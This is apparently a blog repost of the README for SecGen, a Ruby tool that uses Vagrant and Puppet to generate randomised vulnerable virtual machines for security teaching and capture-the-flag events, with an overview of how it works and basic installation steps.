SecGen creates vulnerable virtual machines so students can learn security penetration testing techniques. Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to quickly create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events.

Introduction

Computer security students benefit from engaging in hacking challenges. Practical lab work and pre-configured hacking challenges are common practice both in security education and also as a pastime for security-minded individuals. Competitive hacking challenges, such as capture the flag (CTF) competitions have become a mainstay at industry conferences and are the focus of large online communities. Virtual machines (VMs) provide an effective way of sharing targets for hacking, and can be designed in order to test the skills of the attacker. Websites such as Vulnhub host pre-configured hacking challenge VMs and are a valuable resource for those learning and advancing their skills in computer security. However, developing these hacking challenges is time consuming, and once created, essentially static. That is, once the challenge has been "solved" there is no remaining challenge for the student, and if the challenge is created for a competition or assessment, the challenge cannot be reused without risking plagiarism, and collusion.

Security Scenario Generator (SecGen) generates randomised vulnerable systems. VMs are created based on a scenario specification, which describes the constraints and properties of the VMs to be created. For example, a scenario could specify the creation of a system with a remotely exploitable vulnerability that would result in user-level compromise, and a locally exploitable flaw that would result in root-level compromise. This would require the attacker to discover and exploit both randomly selected vulnerabilities in order to obtain root access to the system. Alternatively, the scenario that is defined can be more specific, specifying certain kinds of services (such as FTP or SMB) or even exact vulnerabilities (by CVE).

SecGen is a Ruby application, with an XML configuration language. SecGen reads its configuration, including the available vulnerabilities, services, networks, users, and content, reads the definition of the requested scenario, applies logic for randomising the scenario, and leverages Puppet and Vagrant to provision the required VMs.

Installation

SecGen is developed and tested on Ubuntu Linux. In theory, SecGen should run on Mac or Windows, if you have all the required software installed.

You will need to install the following:
On Ubuntu these commands will get you up and running Install all the required packages:
Copy SecGen to a directory of your choosing, such as /home/user/bin/SecGen, then:
cd /home/user/bin/SecGen
bundle install

Optional software requirements

EWF image creation

To generate forensic images in the EWF image format FTK Imager command line is required. Download link for FTK Imager command line: https://accessdata.com/product-download/debian-and-ubuntu-x64-3.1.1
Note: The FTK Imager executable needs to be added to the PATH environment variable.
VM Security On Github
https://github.com/anhmeee/SecGen/blob/master/lib/resources/images/readme_gifs/secgen_default_scenario_run.gif
SecGen Security Generator For Linux Open Source
https://github.com/anhmeee/SecGen/blob/master/lib/resources/images/readme_gifs/secgen_default_scenario_run_vm.gif

 

AdBlock Detected!

Like this blog? Keep us running by whitelisting this blog in your ad blocker.

This is how to whitelisting this blog in your ad blocker.

Thank you!

×